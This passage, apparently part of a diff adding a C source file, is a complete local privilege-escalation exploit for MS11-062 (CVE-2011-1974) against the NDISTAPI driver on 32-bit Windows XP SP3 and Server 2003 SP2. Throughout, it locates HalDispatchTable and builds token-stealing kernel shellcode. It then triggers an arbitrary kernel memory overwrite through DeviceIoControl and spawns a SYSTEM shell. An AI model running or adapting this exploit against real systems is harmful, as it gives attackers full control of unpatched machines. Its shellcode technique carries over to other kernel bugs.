http://www.cas.stc.sh.cn/jsjyup/pdf/2015/5/%E5%9F%BA%E4%BA%8E%E9%9D%99%E6%80%81%E6%B1%A1%E7%82%B9%E5%88%86%E6%9E%90%E6%8A%80%E6%9C%AF%E7%9A%84%E8%BD%AF%E4%BB%B6%E5%86%85%E6%A0%B8%E9%A9%B1%E5%8A%A8%E5%AE%89%E5%85%A8%E6%80%A7%E6%A3%80%E6%B5%8B.pdf +# https://translate.google.com/ +################################################################ +*/ + + +#include +#include +#include +#include + +#pragma comment (lib, "ws2_32.lib") + + +//////////////////////////////////////////////////////////////// +// DEFINE DATA TYPES +//////////////////////////////////////////////////////////////// + +typedef enum _KPROFILE_SOURCE { + ProfileTime, + ProfileAlignmentFixup, + ProfileTotalIssues, + ProfilePipelineDry, + ProfileLoadInstructions, + ProfilePipelineFrozen, + ProfileBranchInstructions, + ProfileTotalNonissues, + ProfileDcacheMisses, + ProfileIcacheMisses, + ProfileCacheMisses, + ProfileBranchMispredictions, + ProfileStoreInstructions, + ProfileFpInstructions, + ProfileIntegerInstructions, + Profile2Issue, + Profile3Issue, + Profile4Issue, + ProfileSpecialInstructions, + ProfileTotalCycles, + ProfileIcacheIssues, + ProfileDcacheAccesses, + ProfileMemoryBarrierCycles, + ProfileLoadLinkedIssues, + ProfileMaximum +} KPROFILE_SOURCE, *PKPROFILE_SOURCE; + + +typedef DWORD (WINAPI *PNTQUERYINTERVAL) ( + KPROFILE_SOURCE ProfileSource, + PULONG Interval +); + + +typedef LONG NTSTATUS; + + +typedef NTSTATUS (WINAPI *PNTALLOCATE) ( + HANDLE ProcessHandle, + PVOID *BaseAddress, + ULONG ZeroBits, + PULONG RegionSize, + ULONG AllocationType, + ULONG Protect +); + + +typedef struct _SYSTEM_MODULE_INFORMATION { + ULONG Reserved[2]; + PVOID Base; + ULONG Size; + ULONG Flags; + USHORT Index; + USHORT Unknown; + USHORT LoadCount; + USHORT ModuleNameOffset; + CHAR ImageName[256]; +} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; + + +typedef BOOL (WINAPI *LPFN_ISWOW64PROCESS) (HANDLE, PBOOL); + + +//////////////////////////////////////////////////////////////// +// FUNCTIONS +//////////////////////////////////////////////////////////////// + +BOOL IsWow64() +{ + BOOL bIsWow64 = FALSE; + LPFN_ISWOW64PROCESS fnIsWow64Process; + + fnIsWow64Process = (LPFN_ISWOW64PROCESS) GetProcAddress(GetModuleHandle(TEXT("kernel32")), "IsWow64Process"); + + if(NULL != fnIsWow64Process) + { + // https://msdn.microsoft.com/en-us/library/windows/desktop/ms684139(v=vs.85).aspx + if (!fnIsWow64Process(GetCurrentProcess(), &bIsWow64)) + { + // https://msdn.microsoft.com/en-us/library/windows/desktop/ms681381(v=vs.85).aspx + printf(" [-] Failed (error code: %d)\n", GetLastError()); + return -1; + } + } + return bIsWow64; +} + + +//////////////////////////////////////////////////////////////// +// MAIN FUNCTION +//////////////////////////////////////////////////////////////// + +int main(void) +{ + printf("[*] MS11-062 (CVE-2011-1974) x86 exploit\n"); + printf(" [*] by Tomislav Paskalev\n"); + + + //////////////////////////////////////////////////////////////// + // IDENTIFY TARGET OS ARCHITECTURE AND VERSION + //////////////////////////////////////////////////////////////// + + printf("[*] Identifying OS\n"); + + + // identify target machine's OS architecture + // in case the target machine is running a 64-bit OS + if(IsWow64()) + { + printf(" [-] 64-bit\n"); + return -1; + } + + printf(" [+] 32-bit\n"); + + + // identify target machine's OS version + // https://msdn.microsoft.com/en-us/library/windows/desktop/ms724451(v=vs.85).aspx + // https://msdn.microsoft.com/en-us/library/windows/desktop/ms724832(v=vs.85).aspx + // https://msdn.microsoft.com/en-us/library/windows/desktop/ms724833(v=vs.85).aspx + OSVERSIONINFOEX osvi; + ZeroMemory(&osvi, sizeof(OSVERSIONINFOEX)); + osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX); + GetVersionEx((LPOSVERSIONINFO) &osvi); + + // define operating system version specific variables + unsigned char shellcode_KPROCESS; + unsigned char shellcode_TOKEN; + unsigned char shellcode_UPID; + unsigned char shellcode_APLINKS; + const char **securityPatchesPtr; + int securityPatchesCount; + + //////////////////////////////////////////////////////////////// + /* + OS VERSION SPECIFIC OFFSETS + + references: + http://www.geoffchappell.com/studies/windows/km/ntoskrnl/structs/kthread/original.htm + http://www.geoffchappell.com/studies/windows/km/ntoskrnl/structs/kthread/late52.htm + http://www.geoffchappell.com/studies/windows/km/ntoskrnl/structs/kthread/current.htm + http://www.geoffchappell.com/studies/windows/km/ntoskrnl/structs/eprocess/ + */ + //////////////////////////////////////////////////////////////// + + // in case the OS version is 5.1, service pack 3 + if((osvi.dwMajorVersion == 5) && (osvi.dwMinorVersion == 1) && (osvi.wServicePackMajor == 3)) + { + // the target machine's OS is Windows XP SP3 + printf(" [+] Windows XP SP3\n"); + shellcode_KPROCESS = '\x44'; + shellcode_TOKEN = '\xC8'; + shellcode_UPID = '\x84'; + shellcode_APLINKS = '\x88'; + const char *securityPatches[] = {"KB2566454"}; + securityPatchesPtr = securityPatches; + securityPatchesCount = 1; + } + + // in case the OS version is 5.2, service pack 2, not R2 + // https://msdn.microsoft.com/en-us/library/windows/desktop/ms724385(v=vs.85).aspx + else if((osvi.dwMajorVersion == 5) && (osvi.dwMinorVersion == 2) && (osvi.wServicePackMajor == 2) && (GetSystemMetrics(89) == 0)) + { + // the target machine's OS is Windows Server 2003 SP2 + printf(" [+] Windows Server 2003 SP2\n"); + shellcode_KPROCESS = '\x38'; + shellcode_TOKEN = '\xD8'; + shellcode_UPID = '\x94'; + shellcode_APLINKS = '\x98'; + const char *securityPatches[] = {"KB2566454"}; + securityPatchesPtr = securityPatches; + securityPatchesCount = 1; + } + + // in case the OS version is not any of the previously checked versions + else + { + // the target machine's OS is an unsupported 32-bit Windows version + printf(" [-] Unsupported version\n"); + printf(" [*] Affected 32-bit operating systems\n"); + printf(" [*] Windows XP SP3\n"); + printf(" [*] Windows Server 2003 SP2\n"); + return -1; + } + + + //////////////////////////////////////////////////////////////// + // LOCATE REQUIRED OS COMPONENTS + //////////////////////////////////////////////////////////////// + + printf("[*] Locating required OS components\n"); + + + // retrieve system information + // https://msdn.microsoft.com/en-us/library/windows/desktop/ms725506(v=vs.85).aspx + // locate "ZwQuerySystemInformation" in the "ntdll.dll" module + // https://msdn.microsoft.com/en-us/library/windows/desktop/ms683212(v=vs.85).aspx + FARPROC ZwQuerySystemInformation; + ZwQuerySystemInformation = GetProcAddress(GetModuleHandle("ntdll.dll"), "ZwQuerySystemInformation"); + + // 11 = SystemModuleInformation + // http://winformx.florian-rappl.de/html/e6d5d5c1-8d83-199b-004f-8767439c70eb.htm + ULONG systemInformation; + ZwQuerySystemInformation(11, (PVOID) &systemInformation, 0, &systemInformation); + + // allocate memory for the list of loaded modules + ULONG *systemInformationBuffer; + systemInformationBuffer = (ULONG *) malloc(systemInformation * sizeof(*systemInformationBuffer)); + + if(!systemInformationBuffer) + { + printf(" [-] Could not allocate memory"); + return -1; + } + + + // retrieve the list of loaded modules + ZwQuerySystemInformation(11, systemInformationBuffer, systemInformation * sizeof(*systemInformationBuffer), NULL); + + // locate "ntkrnlpa.exe" or "ntoskrnl.exe" in the retrieved list of loaded modules + ULONG i; + PVOID targetKrnlMdlBaseAddr; + HMODULE targetKrnlMdlUsrSpcOffs; + BOOL foundModule = FALSE; + PSYSTEM_MODULE_INFORMATION loadedMdlStructPtr; + loadedMdlStructPtr = (PSYSTEM_MODULE_INFORMATION) (systemInformationBuffer + 1); + + for(i = 0; i < *systemInformationBuffer; i++) + { + if(strstr(loadedMdlStructPtr[i].ImageName, "ntkrnlpa.exe")) + { + printf(" [+] ntkrnlpa.exe\n"); + targetKrnlMdlUsrSpcOffs = LoadLibraryExA("ntkrnlpa.exe", 0, 1); + targetKrnlMdlBaseAddr = loadedMdlStructPtr[i].Base; + foundModule = TRUE; + break; + } + else if(strstr(loadedMdlStructPtr[i].ImageName, "ntoskrnl.exe")) + { + printf(" [+] ntoskrnl.exe\n"); + targetKrnlMdlUsrSpcOffs = LoadLibraryExA("ntoskrnl.exe", 0, 1); + targetKrnlMdlBaseAddr = loadedMdlStructPtr[i].Base; + foundModule = TRUE; + break; + } + } + + // base address of the loaded module (kernel space) + printf(" [*] Address: %#010x\n", targetKrnlMdlBaseAddr); + + // offset address (relative to the parent process) of the loaded module (user space) + printf(" [*] Offset: %#010x\n", targetKrnlMdlUsrSpcOffs); + + if(!foundModule) + { + printf(" [-] Could not find ntkrnlpa.exe/ntoskrnl.exe\n"); + return -1; + } + + // free allocated buffer space + free(systemInformationBuffer); + + + // determine the address of the "HalDispatchTable" process (kernel space) + // locate the offset fo the "HalDispatchTable" process within the target module (user space) + ULONG_PTR HalDispatchTableUsrSpcOffs; + HalDispatchTableUsrSpcOffs = (ULONG_PTR) GetProcAddress(targetKrnlMdlUsrSpcOffs, "HalDispatchTable"); + + if(!HalDispatchTableUsrSpcOffs) + { + printf(" [-] Could not find HalDispatchTable\n"); + return -1; + } + + printf(" [+] HalDispatchTable\n"); + printf(" [*] Offset: %#010x\n", HalDispatchTableUsrSpcOffs); + + // calculate the address of "HalDispatchTable" in kernel space + // 1. identify the base address of the target module in kernel space + // 2. previous step's result [minus] the load address of the same module in user space + // 3. previous step's result [plus] the address of "HalDispatchTable" in user space + // EQUIVALENT TO: + // 1. determine RVA of HalDispatchTable + // *Relative Virtual Address - the address of an item after it is loaded into memory, with the base address of the image file subtracted from it. + // 2. previous step's result [plus] base address of target module in kernel space + ULONG_PTR HalDispatchTableKrnlSpcAddr; + HalDispatchTableKrnlSpcAddr = HalDispatchTableUsrSpcOffs - (ULONG_PTR) targetKrnlMdlUsrSpcOffs; + HalDispatchTableKrnlSpcAddr += (ULONG_PTR) targetKrnlMdlBaseAddr; + + + // locate "NtQueryIntervalProfile" in the "ntdll.dll" module + PNTQUERYINTERVAL NtQueryIntervalProfile; + NtQueryIntervalProfile = (PNTQUERYINTERVAL) GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryIntervalProfile"); + + if(!NtQueryIntervalProfile) + { + printf(" [-] Could not find NtQueryIntervalProfile\n"); + return -1; + } + + printf(" [+] NtQueryIntervalProfile\n"); + printf(" [*] Address: %#010x\n", NtQueryIntervalProfile); + + + //////////////////////////////////////////////////////////////// + // CREATE TOKEN STEALING SHELLCODE + //////////////////////////////////////////////////////////////// + + printf("[*] Creating token stealing shellcode\n"); + + + // construct the token stealing shellcode + unsigned char shellcode[] = + { + 0x52, // PUSH EDX Save EDX on the stack (save context) + 0x53, // PUSH EBX Save EBX on the stack (save context) + 0x33,0xC0, // XOR EAX, EAX Zero out EAX (EAX = 0) + 0x64,0x8B,0x80,0x24,0x01,0x00,0x00, // MOV EAX, FS:[EAX+0x124] Retrieve current _KTHREAD structure + 0x8B,0x40,shellcode_KPROCESS, // MOV EAX, [EAX+_KPROCESS] Retrieve _EPROCESS structure + 0x8B,0xC8, // MOV ECX, EAX Copy EAX (_EPROCESS) to ECX + 0x8B,0x98,shellcode_TOKEN,0x00,0x00,0x00, // MOV EBX, [EAX+_TOKEN] Retrieve current _TOKEN + 0x8B,0x80,shellcode_APLINKS,0x00,0x00,0x00, // MOV EAX, [EAX+_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks + 0x81,0xE8,shellcode_APLINKS,0x00,0x00,0x00, // SUB EAX, _APLINKS | Retrieve EPROCESS from ActiveProcessLinks + 0x81,0xB8,shellcode_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // CMP [EAX+_UPID], 0x4 | Compare UniqueProcessId with 4 (System Process) + 0x75,0xE8, // JNZ/JNE ---- Jump if not zero/not equal + 0x8B,0x90,shellcode_TOKEN,0x00,0x00,0x00, // MOV EDX, [EAX+_TOKEN] Copy SYSTEM _TOKEN to EDX + 0x8B,0xC1, // MOV EAX, ECX Copy ECX (current process _TOKEN) to EAX + 0x89,0x90,shellcode_TOKEN,0x00,0x00,0x00, // MOV [EAX+_TOKEN], EDX Copy SYSTEM _TOKEN to current process _TOKEN + 0x5B, // POP EBX Pop current stack value to EBX (restore context) + 0x5A, // POP EDX Pop current stack value to EDX (restore context) + 0xC2,0x08 // RET 8 Return + }; + + printf(" [*] Shellcode assembled\n"); + + + // allocate memory (RWE permissions) for the shellcode + printf(" [*] Allocating memory\n"); + LPVOID shellcodeAddress; + shellcodeAddress = VirtualAlloc(NULL, sizeof(shellcode), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); + + if(shellcodeAddress == NULL) + { + // https://msdn.microsoft.com/en-us/library/windows/desktop/ms681381(v=vs.85).aspx + printf(" [-] Failed (error code: %d)\n", GetLastError()); + return -1; + } + + printf(" [+] Address: %#010x\n", shellcodeAddress); + + + // copy the shellcode to the allocated memory + memcpy((shellcodeAddress), shellcode, sizeof(shellcode)); + printf(" [*] Shellcode copied\n"); + + + //////////////////////////////////////////////////////////////// + // EXPLOIT THE VULNERABILITY + //////////////////////////////////////////////////////////////// + + printf("[*] Exploiting vulnerability\n"); + + + // open the vulnerable device driver + HANDLE targetDeviceHandle; + ULONG dwReturnSize; + int errorCode = 0; + + printf(" [*] Opening NDISTAPI device driver\n"); + // https://msdn.microsoft.com/en-us/library/windows/desktop/aa363858(v=vs.85).aspx + targetDeviceHandle = CreateFile("\\\\.\\NDISTAPI", GENERIC_READ | GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, 0); + + // in case the function fails + if(targetDeviceHandle == INVALID_HANDLE_VALUE) + { + // the device driver was not opened successfully + // https://msdn.microsoft.com/en-us/library/windows/desktop/ms679360(v=vs.85).aspx + errorCode = GetLastError(); + // https://msdn.microsoft.com/en-us/library/windows/desktop/ms681381(v=vs.85).aspx + // in case of ERROR_FILE_NOT_FOUND + if(errorCode == 2) + { + // the vulnerable service is not running + printf(" [!] Remote Access Service not started\n"); + printf(" [*] run \"sc start remoteaccess\"\n"); + return -1; + } + // in case of any other error message + else + { + printf(" [-] Failed (error code: %d)\n", errorCode); + return -1; + } + } + // in case the function succeeds + else + { + // the device driver was opened succesfully + printf(" [+] Done\n"); + } + + + // copy the shellcode address to the input buffer + unsigned char InputBuffer[8]={0}; + memcpy((InputBuffer + 4), &shellcodeAddress, sizeof(shellcodeAddress)); + + + // trigger vulnerability (cause arbitrary memory overwrite) + printf(" [*] Calling vulnerable function\n"); + if(DeviceIoControl( + targetDeviceHandle, + 0x8fff23d4, // DoLineCreateWork + (PVOID) InputBuffer, sizeof(InputBuffer), + (PVOID) (HalDispatchTableKrnlSpcAddr), 0, + &dwReturnSize, NULL + ) == 0) + { + // https://msdn.microsoft.com/en-us/library/windows/desktop/ms679360(v=vs.85).aspx + errorCode = GetLastError(); + // https://msdn.microsoft.com/en-us/library/windows/desktop/ms681381(v=vs.85).aspx + // in case of ERROR_INSUFFICIENT_BUFFER + if(errorCode == 122) + { + // target is patched + printf(" [!] Target patched\n"); + printf(" [*] Possible security patches\n"); + for(i = 0; i < securityPatchesCount; i++) + printf(" [*] %s\n", securityPatchesPtr[i]); + return -1; + } + // in case of any other error message + else + { + // print the error code + printf(" [-] Failed (error code: %d)\n", errorCode); + return -1; + } + } + else + printf(" [+] Done\n"); + + + // elevate privileges of the current process + printf(" [*] Elevating privileges to SYSTEM\n"); + ULONG outInterval = 0; + // https://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FNT%20Objects%2FProfile%2FNtQueryIntervalProfile.html + NtQueryIntervalProfile(2, &outInterval); + printf(" [+] Done\n"); + + + // spawn shell (with elevated privileges) + printf(" [*] Spawning shell\n"); + // spawn SYSTEM shell within the current shell (remote shell friendly) + system ("c:\\windows\\system32\\cmd.exe /K cd c:\\windows\\system32"); + + // exit + printf("\n[*] Exiting SYSTEM shell\n"); + return 1; +} + +// EoF